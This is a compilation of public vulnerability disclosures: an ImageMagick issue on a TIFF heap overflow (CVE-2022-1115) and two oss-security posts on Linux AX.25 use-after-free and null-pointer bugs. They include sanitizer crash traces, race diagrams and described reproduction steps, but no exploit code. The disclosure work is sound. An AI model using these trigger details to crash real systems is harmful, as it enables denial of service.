A heap-buffer-overflow flaw was found in ImageMagick’s PushShortPixel() function of quantum-private.h file. This vulnerability is triggered when an attacker passes a specially crafted TIFF image file to ImageMagick for conversion, potentially leading to a denial of service.

**ImageMagick version**

7.1.0-28

**Operating system**

Linux

**Operating system, version and so on**

OS: Ubuntu 20.04.3 LTS  
Version: ImageMagick 7.1.0-28 Q16-HDRI x86\_64 2022-03-04 https://imagemagick.org  
Copyright: (C) 1999 ImageMagick Studio LLC  
License: https://imagemagick.org/script/license.php  
Features: Cipher DPC HDRI  
Delegates (built-in): bzlib fontconfig freetype jbig jng jpeg lzma pangocairo png tiff x xml zlib  
Compiler: gcc (4.2)

**Description**

Hello,  
We found a heap overflow vulnerability in magick

**Steps to Reproduce**

build it  
CC=afl-clang-lto CXX=afl-clang-lto++ CFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" LDFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" ./configure --disable-shared --prefix="/root/fuzz/target/imagemagick/ImageMagick/install"

AFL_USE_ASAN=1 make -j24 && make install -j24

run it  
./magick convert poc /dev/null  
output

\=================================================================  
\==1195823==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61900000181c at pc 0x000000cd5328 bp 0x7ffdacd61fa0 sp 0x7ffdacd61f98  
READ of size 1 at 0x61900000181c thread T0  
#0 0xcd5327 in PushShortPixel /root/fuzz/target/image\_magick/ImageMagick/./MagickCore/quantum-private.h  
#1 0xcd5327 in ImportRGBAQuantum /root/fuzz/target/image\_magick/ImageMagick/MagickCore/quantum-import.c:4232:15  
#2 0xcd5327 in ImportQuantumPixels /root/fuzz/target/image\_magick/ImageMagick/MagickCore/quantum-import.c:4780:7  
#3 0x13e73f2 in ReadTIFFImage /root/fuzz/target/imagemagick/ImageMagick/coders/tiff.c:2052:24  
#4 0x6f9981 in ReadImage /root/fuzz/target/image\_magick/ImageMagick/MagickCore/constitute.c:728:15  
#5 0x6fe991 in ReadImages /root/fuzz/target/image\_magick/ImageMagick/MagickCore/constitute.c:1075:9  
#6 0x157caa5 in ConvertImageCommand /root/fuzz/target/imagemagick/ImageMagick/MagickWand/convert.c:614:18  
#7 0x17191fd in MagickCommandGenesis /root/fuzz/target/imagemagick/ImageMagick/MagickWand/mogrify.c:188:14  
#8 0x580b89 in MagickMain /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:150:10  
#9 0x580b89 in main /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:182:10  
#10 0x7f499b68b0b2 in \_\_libc\_start\_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16  
#11 0x4ce36d in \_start (/root/fuzz/target/imagemagick/ImageMagick/install/bin/magick+0x4ce36d)

0x61900000181c is located 10 bytes to the right of 914-byte region \[0x619000001480,0x619000001812)  
allocated by thread T0 here:  
#0 0x54ab1d in malloc (/root/fuzz/target/imagemagick/ImageMagick/install/bin/magick+0x54ab1d)  
#1 0x13e6faf in ReadTIFFImage /root/fuzz/target/imagemagick/ImageMagick/coders/tiff.c:1996:39  
#2 0x6f9981 in ReadImage /root/fuzz/target/image\_magick/ImageMagick/MagickCore/constitute.c:728:15  
#3 0x6fe991 in ReadImages /root/fuzz/target/image\_magick/ImageMagick/MagickCore/constitute.c:1075:9  
#4 0x157caa5 in ConvertImageCommand /root/fuzz/target/imagemagick/ImageMagick/MagickWand/convert.c:614:18  
#5 0x17191fd in MagickCommandGenesis /root/fuzz/target/imagemagick/ImageMagick/MagickWand/mogrify.c:188:14  
#6 0x580b89 in MagickMain /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:150:10  
#7 0x580b89 in main /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:182:10  
#8 0x7f499b68b0b2 in \_\_libc\_start\_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/fuzz/target/image\_magick/ImageMagick/./MagickCore/quantum-private.h in PushShortPixel  
Shadow bytes around the buggy address:  
0x0c327fff82b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0c327fff82c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0c327fff82d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0c327fff82e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0c327fff82f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
\=>0x0c327fff8300: 00 00 02\[fa\]fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c327fff8310: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c327fff8320: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c327fff8330: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c327fff8340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c327fff8350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
Left alloca redzone: ca  
Right alloca redzone: cb  
\==1195823==ABORTING

**Images**

poc.zip

CVE-2022-1115: heap-buffer-overflow in magick at quantum-private.h PushShortPixel · Issue #4974 · ImageMagick/ImageMagick

A use-after-free flaw was found in the Linux kernel’s Amateur Radio AX.25 protocol functionality in the way a user connects with the protocol. This flaw allows a local user to crash the system.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Sat, 2 Apr 2022 14:53:10 +0800 (GMT+08:00)
From: 周多明 <duoming@....edu.cn>
To: oss-security@...ts.openwall.com
Subject: CVE-2022-1204: Linux kernel: UAF caused by binding operation when
 ax25 device is detaching

Hello there,

There are use-after-free vulnerabilities in net/ax25/af\_ax25.c of linux that allow 
attacker to crash linux kernel by simulating ax25 device from user space.

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Details  =\*=\*=\*=\*=\*=\*=\*=\*=

The resources such as ax25\_dev and net\_device will be freed in ax25\_dev\_device\_down(),
if we call ax25\_bind() between ax25\_kill\_by\_device() and kfree() in ax25\_dev\_device\_down(),
we could use ax25\_dev in functions such as ax25\_bind() ax25\_release(), ax25\_connect(),
ax25\_ioctl(), ax25\_getname(), ax25\_sendmsg(), ax25\_getsockopt() and ax25\_info\_show() after
ax25\_dev has been deallocated, and use net\_device in functions such as ax25\_release(),
ax25\_sendmsg(), ax25\_getsockopt(), ax25\_getname() and ax25\_info\_show() after net\_device
has been deallocated.

One of the concurrency UAF related with ax25\_dev in ax25\_bind() can be shown as below:

       (USE)                  |     (FREE)
                              |  ax25\_device\_event
                              |    ax25\_dev\_device\_down
ax25\_bind                     |    ...
  ...                         |      kfree(ax25\_dev)
  ax25\_fillin\_cb()            |    ...
    ax25\_fillin\_cb\_from\_dev() |
  ...                         |

One of the concurrency UAF related with net\_device in ax25\_release() can be shown as below:

          (USE)                   |      (FREE)
                                  |  ax25\_kill\_by\_device()
    ax25\_bind()                   |
    ax25\_connect()                |    ...
                                  |  ax25\_dev\_device\_down()
                                  |    ...
                                  |    dev\_put\_track(dev, ...) //FREE
    ax25\_release()                |    ...
      ax25\_send\_control()         |
        alloc\_skb()      //USE    |

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Effects  =\*=\*=\*=\*=\*=\*=\*=\*=

We can successfully trigger the vulnerabilities to crash the linux kernel.

(1) One of the use-after-free bug backtraces related with ax25\_dev is shown below.

\[  208.136725\] BUG: KASAN: use-after-free in ax25\_send\_control+0x3c/0x210
\[  208.136725\] Read of size 8 at addr ffff888007c4ad08 by task ax25\_co\_rel/3072
\[  208.136725\] Call Trace:
\[  208.136725\]  dump\_stack+0x7d/0xa3
\[  208.136725\]  print\_address\_description.constprop.0+0x18/0x130
\[  208.136725\]  ? ax25\_send\_control+0x3c/0x210
\[  208.136725\]  ? ax25\_send\_control+0x3c/0x210
\[  208.136725\]  kasan\_report.cold+0x7f/0x10e
\[  208.136725\]  ? \_raw\_write\_lock\_bh+0x80/0xd0
\[  208.136725\]  ? ax25\_send\_control+0x3c/0x210
\[  208.136725\]  ax25\_send\_control+0x3c/0x210
\[  208.136725\]  ax25\_release+0x2db/0x3b0
\[  208.136725\]  \_\_sock\_release+0x6d/0x120
\[  208.136725\]  sock\_close+0xc/0x10
\[  208.136725\]  \_\_fput+0x104/0x3b0
\[  208.136725\]  task\_work\_run+0x8f/0xd0
\[  208.136725\]  get\_signal+0xbae/0xc00
\[  208.136725\]  ? ax25\_connect+0x3c1/0x800
\[  208.136725\]  arch\_do\_signal\_or\_restart+0x1d9/0xc70
\[  208.136725\]  ? wait\_woken+0x110/0x110
\[  208.136725\]  ? selinux\_netlbl\_socket\_connect+0x26/0x30
\[  208.136725\]  ? kick\_process+0x12/0x80
\[  208.136725\]  ? task\_work\_add+0xcd/0xe0
\[  208.136725\]  ? restore\_sigcontext+0x320/0x320
\[  208.136725\]  ? \_\_sys\_connect+0x108/0x120
\[  208.136725\]  ? \_\_sys\_connect\_file+0xc0/0xc0
\[  208.136725\]  ? common\_nsleep+0x5a/0x70
\[  208.136725\]  ? copy\_init\_fpstate\_to\_fpregs+0x60/0x60
\[  208.136725\]  ? \_\_ia32\_sys\_clock\_adjtime+0x30/0x30
\[  208.136725\]  exit\_to\_user\_mode\_prepare+0xaa/0x120
\[  208.136725\]  syscall\_exit\_to\_user\_mode+0x1d/0x40
\[  208.136725\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xa9
\[  208.136725\] RIP: 0033:0x7fa754c17d2b
\[  208.136725\] Code: 83 ec 18 89 54 24 0c 48 89 34 24 89 7c 24 08 e8 fb fa ff ff 8b 54 24 0c 48 8b 34 24 41 89 c0 8b 7c 24 08 b8 2a 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 2f 44 89 c7 89 44 24 08 e8 31 fb ff ff 8b 44
\[  208.136725\] RSP: 002b:00007fa5dfd26ee0 EFLAGS: 00000293 ORIG\_RAX: 000000000000002a
\[  208.136725\] RAX: fffffffffffffe00 RBX: 0000000000000000 RCX: 00007fa754c17d2b
\[  208.136725\] RDX: 0000000000000010 RSI: 00000000006021c0 RDI: 0000000000000005
\[  208.136725\] RBP: 00007fa5dfd26f00 R08: 0000000000000000 R09: 00007fa5dfd27700
\[  208.136725\] R10: 0000000000000000 R11: 0000000000000293 R12: 00007ffc91618f7e
\[  208.136725\] R13: 00007ffc91618f7f R14: 00007fa5dfd26fc0 R15: 00007fa5dfd27700
\[  208.136725\] 
\[  208.136725\] Allocated by task 3070:
\[  208.136725\]  kasan\_save\_stack+0x1b/0x40
\[  208.136725\]  \_\_\_\_kasan\_kmalloc.constprop.0+0x84/0xa0
\[  208.136725\]  ax25\_dev\_device\_up+0x27/0x1a0
\[  208.136725\]  ax25\_device\_event+0x12d/0x160
\[  208.136725\]  raw\_notifier\_call\_chain+0x5e/0x70
\[  208.136725\]  \_\_dev\_notify\_flags+0xbf/0x180
\[  208.136725\]  dev\_change\_flags+0x92/0xb0
\[  208.136725\]  devinet\_ioctl+0x92f/0xbd0
\[  208.136725\]  inet\_ioctl+0x259/0x290
\[  208.136725\]  sock\_do\_ioctl+0xa8/0x1e0
\[  208.136725\]  sock\_ioctl+0x2ee/0x3f0
\[  208.136725\]  \_\_x64\_sys\_ioctl+0xb4/0xf0
\[  208.136725\]  do\_syscall\_64+0x33/0x40
\[  208.136725\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xa9
\[  208.136725\] 
\[  208.136725\] Freed by task 3071:
\[  208.136725\]  kasan\_save\_stack+0x1b/0x40
\[  208.136725\]  kasan\_set\_track+0x1c/0x30
\[  208.136725\]  kasan\_set\_free\_info+0x20/0x30
\[  208.136725\]  \_\_\_\_kasan\_slab\_free+0xec/0x120
\[  208.136725\]  kfree+0x8f/0x210
\[  208.136725\]  ax25\_device\_event+0x14e/0x160
\[  208.136725\]  raw\_notifier\_call\_chain+0x5e/0x70
\[  208.136725\]  dev\_close\_many+0x17d/0x230
\[  208.136725\]  rollback\_registered\_many+0x1f1/0x950
\[  208.136725\]  unregister\_netdevice\_queue+0x133/0x200
\[  208.136725\]  unregister\_netdev+0x13/0x20
\[  208.136725\]  mkiss\_close+0xc4/0x120
\[  208.136725\]  tty\_ldisc\_hangup+0x1ab/0x2d0
\[  208.136725\]  \_\_tty\_hangup.part.0+0x306/0x510
\[  208.136725\]  tty\_release+0x200/0x670
\[  208.136725\]  \_\_fput+0x104/0x3b0
\[  208.136725\]  task\_work\_run+0x8f/0xd0
\[  208.136725\]  exit\_to\_user\_mode\_prepare+0x114/0x120
\[  208.136725\]  syscall\_exit\_to\_user\_mode+0x1d/0x40
\[  208.136725\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xa9

(2) One of the use-after-free bug backtraces related with net\_device is shown below.

\[  769.959339\] BUG: KASAN: use-after-free in ax25\_send\_control+0x43/0x210
\[  769.959339\] Read of size 2 at addr ffff8880092520de by task ax25\_co\_rel/1970
\[  769.966904\] Call Trace:
\[  769.966904\]  <TASK>
\[  769.966904\]  dump\_stack\_lvl+0x57/0x7d
\[  769.966904\]  print\_address\_description.constprop.0+0x1f/0x150
\[  769.966904\]  ? ax25\_send\_control+0x43/0x210
\[  769.966904\]  ? ax25\_send\_control+0x43/0x210
\[  769.966904\]  kasan\_report.cold+0x7f/0x11b
\[  769.966904\]  ? ax25\_send\_control+0x43/0x210
\[  769.966904\]  ax25\_send\_control+0x43/0x210
\[  769.966904\]  ? trace\_hardirqs\_on+0x1c/0x110
\[  769.966904\]  ax25\_release+0x2db/0x3b0
\[  769.966904\]  ? lock\_release+0xb2/0x470
\[  769.966904\]  \_\_sock\_release+0x6d/0x120
\[  769.966904\]  sock\_close+0xf/0x20
\[  769.966904\]  \_\_fput+0x11f/0x420
\[  769.966904\]  task\_work\_run+0x86/0xd0
\[  769.966904\]  get\_signal+0x1096/0x1240
\[  769.966904\]  ? lockdep\_hardirqs\_on\_prepare+0xe/0x230
\[  769.966904\]  ? \_\_local\_bh\_enable\_ip+0x7e/0xf0
\[  769.966904\]  ? trace\_hardirqs\_on+0x1c/0x110
\[  769.966904\]  ? ax25\_connect+0x3c1/0x800
\[  769.966904\]  ? signal\_setup\_done+0x2a0/0x2a0
\[  769.966904\]  arch\_do\_signal\_or\_restart+0x1df/0xbf0
\[  770.012784\]  exit\_to\_user\_mode\_prepare+0x143/0x1c0
\[  770.012784\]  syscall\_exit\_to\_user\_mode+0x19/0x50
\[  770.012784\]  do\_syscall\_64+0x48/0x90
\[  770.012784\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xae
\[  770.012784\] RIP: 0033:0x7fba03510d2b
\[  770.012784\] Code: 83 ec 18 89 54 24 0c 48 89 34 24 89 7c 24 08 e8 fb fa ff ff 8b 54 24 0c 48 8b 34 24 41 89 c0 8b 7c 24 08 b8 2a 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 2f 44
\[  770.016580\] RSP: 002b:00007fb9a9f5aee0 EFLAGS: 00000293 ORIG\_RAX: 000000000000002a
\[  770.016580\] RAX: fffffffffffffe00 RBX: 0000000000000000 RCX: 00007fba03510d2b
\[  770.021380\] RDX: 0000000000000010 RSI: 00000000006021c0 RDI: 0000000000000005
\[  770.021380\] RBP: 00007fb9a9f5af00 R08: 0000000000000000 R09: 00007fb9a9f5b700
\[  770.021380\] R10: 0000000000000000 R11: 0000000000000293 R12: 00007ffeb426b5ce
\[  770.021380\] R13: 00007ffeb426b5cf R14: 00007fb9a9f5afc0 R15: 00007fb9a9f5b700
\[  770.021380\]  </TASK>
\[  770.021380\] 
\[  770.021380\] Allocated by task 1283:
\[  770.025691\]  kasan\_save\_stack+0x1e/0x40
\[  770.025691\]  \_\_kasan\_kmalloc+0x81/0xa0
\[  770.025691\]  alloc\_netdev\_mqs+0x5a/0x680
\[  770.025691\]  mkiss\_open+0x6c/0x380
\[  770.025691\]  tty\_ldisc\_open+0x55/0x90
\[  770.029456\]  tty\_set\_ldisc+0x193/0x2e0
\[  770.029456\]  tty\_ioctl+0x4ae/0xc70
\[  770.029456\]  \_\_x64\_sys\_ioctl+0xb4/0xf0
\[  770.029456\]  do\_syscall\_64+0x3b/0x90
\[  770.029456\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xae
\[  770.029456\] 
\[  770.033625\] Freed by task 1969:
\[  770.033625\]  kasan\_save\_stack+0x1e/0x40
\[  770.033625\]  kasan\_set\_track+0x21/0x30
\[  770.033625\]  kasan\_set\_free\_info+0x20/0x30
\[  770.033625\]  \_\_kasan\_slab\_free+0xfa/0x130
\[  770.033625\]  kfree+0xa3/0x2c0
\[  770.033625\]  device\_release+0x54/0xe0
\[  770.037210\]  kobject\_put+0xa5/0x120
\[  770.037210\]  tty\_ldisc\_kill+0x3e/0x80
\[  770.037210\]  tty\_ldisc\_hangup+0x1b2/0x2c0
\[  770.037210\]  \_\_tty\_hangup.part.0+0x316/0x520
\[  770.037210\]  tty\_release+0x200/0x670
\[  770.037210\]  \_\_fput+0x11f/0x420
\[  770.037210\]  task\_work\_run+0x86/0xd0
\[  770.037210\]  exit\_to\_user\_mode\_prepare+0x1b2/0x1c0
\[  770.037210\]  syscall\_exit\_to\_user\_mode+0x19/0x50
\[  770.041472\]  do\_syscall\_64+0x48/0x90
\[  770.041472\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xae

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Reproduce  =\*=\*=\*=\*=\*=\*=\*=\*=

We could use pseudoterminal-based device emulation to simulate
ax25 device from user space and create a socket for it. Then, 
we create four threads: the first thread is used to initialize 
and start ax25 device, the second thread is used to close the
pseudoterminal-based device, the third thread is used to execute
bind and connect syscalls, the last thread is used to close the 
socket. Let these four threads to interleave, we could reproduce
the bug. 

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Fix  =\*=\*=\*=\*=\*=\*=\*=\*=

The patch that have been applied to mainline Linux kernel is shown below.
https://github.com/torvalds/linux/commit/d01ffb9eee4af165d83b08dd73ebdf9fe94a519b
https://github.com/torvalds/linux/commit/87563a043cef044fed5db7967a75741cc16ad2b1
https://github.com/torvalds/linux/commit/feef318c855a361a1eccd880f33e88c460eb63b4
https://github.com/torvalds/linux/commit/9fd75b66b8f68498454d685dc4ba13192ae069b0
https://github.com/torvalds/linux/commit/5352a761308397a0e6250fdc629bb3f615b94747

=\*=\*=\*=\*=\*=\*=\*=\*=  Timeline  =\*=\*=\*=\*=\*=\*=\*=\*=

2022-01-28: commit d01ffb9eee4a accepted to mainline kernel
2022-02-04: commit 87563a043cef accepted to mainline kernel
2022-01-28: commit feef318c855a accepted to mainline kernel
2022-03-21: commit 9fd75b66b8f6 accepted to mainline kernel
2022-03-29: commit 5352a7613083 accepted to mainline kernel
2022-04-02: CVE-2022-1204 is assigned

=\*=\*=\*=\*=\*=\*=\*=\*=  Credit  =\*=\*=\*=\*=\*=\*=\*=\*=
Duoming Zhou <duoming@....edu.cn>

Best Regards,
Duoming Zhou

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-1204: security - CVE-2022-1204: Linux kernel: UAF caused by binding operation when ax25 device is detaching

A flaw was found in the Linux kernel. This flaw allows an attacker to crash the Linux kernel by simulating amateur radio from the user space, resulting in a null-ptr-deref vulnerability and a use-after-free vulnerability.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Sat, 2 Apr 2022 16:45:07 +0800 (GMT+08:00)
From: 周多明 <duoming@....edu.cn>
To: oss-security@...ts.openwall.com
Subject: CVE-2022-1199 kernel: Null pointer dereference and use-after-free
 in ax25\_release()

Hello there,

There are null-ptr-deref vulnerability and use-after-free vulnerabilities in net/ax25/af\_ax25.c
of linux that allow attacker to crash linux kernel by simulating ax25 device from user-space.

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Details  =\*=\*=\*=\*=\*=\*=\*=\*=

The null-ptr-deref vulnerability is caused by "ax25->sk = NULL" in ax25\_release(). 
The dereference sites include "bh\_lock\_sock(ax25->sk)" and "bh\_unlock\_sock(ax25->sk)"
in ax25\_disconnect(), "lock\_sock(s->sk)" and "release\_sock(s->sk)" in ax25\_kill\_by\_device(). 

The NPD bug related with bh\_lock\_sock(ax25->sk) is shown below:

ax25\_kill\_by\_device()                | ax25\_release()
  ax25\_disconnect()                  |   ax25\_destroy\_socket()
    ...                              |
    if(ax25->sk != NULL)             |     ...
      ...                            |     ax25->sk = NULL;
      bh\_lock\_sock(ax25->sk); //(1)  |     ...
      ...                            |
      bh\_unlock\_sock(ax25->sk); //(2)|

The NPD bug related with lock\_sock(s->sk) is shown below:

ax25\_kill\_by\_device()        | ax25\_release()
                             |   ax25\_destroy\_socket()
                             |     ax25\_cb\_del()
  ...                        |     ...
                             |     ax25->sk=NULL;
  lock\_sock(s->sk); //(1)    |
  s->ax25\_dev = NULL;        |     ...
  release\_sock(s->sk); //(2) |
  ...                        |

The use-after-free vulnerability is caused by "sock\_put(sk)" in ax25\_release(). The dereference 
sites include "lock\_sock(s->sk)" and "release\_sock(s->sk)" in ax25\_kill\_by\_device().

ax25\_kill\_by\_device()        | ax25\_release()
                             |   ax25\_destroy\_socket()
  ...                        |   ...
                             |   sock\_put(sk); //FREE
  lock\_sock(s->sk); //(1)    |
  s->ax25\_dev = NULL;        |   ...
  release\_sock(s->sk); //(2) |
  ...                        |

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Effects  =\*=\*=\*=\*=\*=\*=\*=\*=

We can successfully trigger the vulnerabilities to crash the linux kernel.

The NPD bug related with bh\_lock\_sock() is shown below.

\[  178.776298\] BUG: kernel NULL pointer dereference, address: 0000000000000088
\[  178.777929\] RIP: 0010:\_raw\_spin\_lock+0x7e/0xd0
\[  178.777929\] Code: be 04 00 00 00 c7 44 24 20 00 00 00 00 e8 2a 29 e8 fe be 04 00 00 00 48 8d 7c 24 20 e8 1b 29 e8 fe ba 01 00 00 00 8b 44 24 20 <f0> 0f b1 55 00 75 29 48 b8 00 00 00 00
\[  178.777929\] RSP: 0018:ffff888007dcfa48 EFLAGS: 00000297
\[  178.777929\] RAX: 0000000000000000 RBX: 1ffff11000fb9f49 RCX: ffffffff82482855
\[  178.777929\] RDX: 0000000000000001 RSI: 0000000000000004 RDI: ffff888007dcfa68
\[  178.777929\] RBP: 0000000000000088 R08: 0000000000000001 R09: 0000000000000003
\[  178.777929\] R10: ffffed1000fb9f4d R11: 0000000000000001 R12: 0000000000000065
\[  178.777929\] R13: ffff888009f99800 R14: ffff888009f99860 R15: ffff888009f99800
\[  178.777929\] FS:  00007f9651ce3700(0000) GS:ffff88806d480000(0000) knlGS:0000000000000000
\[  178.777929\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[  178.777929\] CR2: 0000000000000088 CR3: 0000000009876000 CR4: 00000000000006e0
\[  178.777929\] Call Trace:
\[  178.777929\]  ? \_raw\_read\_lock\_irq+0x30/0x30
\[  178.777929\]  ? \_raw\_spin\_unlock\_bh+0x9/0x20
\[  178.777929\]  ? ax25\_link\_failed+0x40/0x60
\[  178.777929\]  ax25\_disconnect+0xf6/0x220
\[  178.777929\]  ax25\_device\_event+0x187/0x250
\[  178.777929\]  raw\_notifier\_call\_chain+0x5e/0x70
\[  178.777929\]  dev\_close\_many+0x17d/0x230
\[  178.777929\]  ? \_\_dev\_close\_many+0x1c0/0x1c0
\[  178.777929\]  rollback\_registered\_many+0x1f1/0x950
\[  178.777929\]  ? \_raw\_write\_lock\_irqsave+0xd0/0xd0
\[  178.777929\]  ? dev\_alloc\_name+0xd0/0xd0
\[  178.777929\]  ? ldsem\_down\_read+0x410/0x410
\[  178.777929\]  unregister\_netdevice\_queue+0x133/0x200
\[  178.777929\]  ? unregister\_netdevice\_many+0x20/0x20
\[  178.777929\]  ? sixpack\_close+0xf8/0x130
\[  178.777929\]  unregister\_netdev+0x13/0x20
\[  178.777929\]  tty\_ldisc\_hangup+0x1ab/0x2d0
\[  178.777929\]  \_\_tty\_hangup.part.0+0x306/0x510
\[  178.777929\]  tty\_release+0x200/0x670
\[  178.777929\]  \_\_fput+0x104/0x3b0
\[  178.777929\]  task\_work\_run+0x8f/0xd0
\[  178.777929\]  exit\_to\_user\_mode\_prepare+0x114/0x120
\[  178.777929\]  syscall\_exit\_to\_user\_mode+0x1d/0x40
\[  178.777929\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xa9

The NPD bug related with lock\_sock() is shown below.

\[  727.493561\] BUG: kernel NULL pointer dereference, address: 0000000000000088
\[  727.493561\] RIP: 0010:\_raw\_spin\_lock\_bh+0x89/0xd0
\[  727.493561\] Code: be 04 00 00 00 c7 44 24 20 00 00 00 00 e8 5f c6 f1 fd be 04 00 00 00 48 8d 7c 24 20 e8 50 c6 f1 fd ba 01 00 00 00 8b 44 24 20 <f0> 0f b1 55 00 75 29 48 b8 00 00 00 00
\[  727.493561\] RSP: 0018:ffff88801569f9c0 EFLAGS: 00000297
\[  727.493561\] RAX: 0000000000000000 RBX: 1ffff11002ad3f38 RCX: ffffffff8366d960
\[  727.493561\] RDX: 0000000000000001 RSI: 0000000000000004 RDI: ffff88801569f9e0
\[  727.493561\] RBP: 0000000000000088 R08: 0000000000000001 R09: 0000000000000003
\[  727.493561\] R10: ffffed1002ad3f3c R11: 0000000000000001 R12: 0000000000000088
\[  727.493561\] R13: ffff888016166700 R14: ffff888014a57dc8 R15: dffffc0000000000
\[  727.493561\] FS:  00007f5cab712700(0000) GS:ffff88806d200000(0000) knlGS:0000000000000000
\[  727.493561\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[  727.493561\] CR2: 0000000000000088 CR3: 000000000a336000 CR4: 00000000000006f0
\[  727.493561\] Call Trace:
\[  727.493561\]  ? \_raw\_spin\_lock+0xd0/0xd0
\[  727.493561\]  release\_sock+0x16/0x170
\[  727.493561\]  ax25\_device\_event+0x1a3/0x270
\[  727.493561\]  ? nr\_device\_event+0xf2/0x140
\[  727.493561\]  raw\_notifier\_call\_chain+0x8d/0xd0
\[  727.493561\]  dev\_close\_many+0x227/0x400
\[  727.493561\]  ? \_\_dev\_close\_many+0x290/0x290
\[  727.493561\]  ? finish\_task\_switch.isra.0+0x205/0x620
\[  727.493561\]  ? \_\_switch\_to+0x572/0xe50
\[  727.493561\]  rollback\_registered\_many+0x2e1/0x1130
\[  727.493561\]  ? dev\_alloc\_name+0xf0/0xf0
\[  727.493561\]  ? ldsem\_down\_read+0x650/0x650
\[  727.493561\]  unregister\_netdevice\_queue+0x1d7/0x3e0
\[  727.493561\]  ? unregister\_netdevice\_many+0x50/0x50
\[  727.493561\]  ? \_raw\_write\_lock\_bh+0xd0/0xd0
\[  727.493561\]  ? down\_write\_killable+0x120/0x120
\[  727.493561\]  unregister\_netdev+0x13/0x20
\[  727.493561\]  mkiss\_close+0x116/0x1f0
\[  727.493561\]  tty\_ldisc\_hangup+0x227/0x5f0
\[  727.493561\]  ? fasync\_remove\_entry+0x28/0x220
\[  727.493561\]  \_\_tty\_hangup.part.0+0x41c/0x910
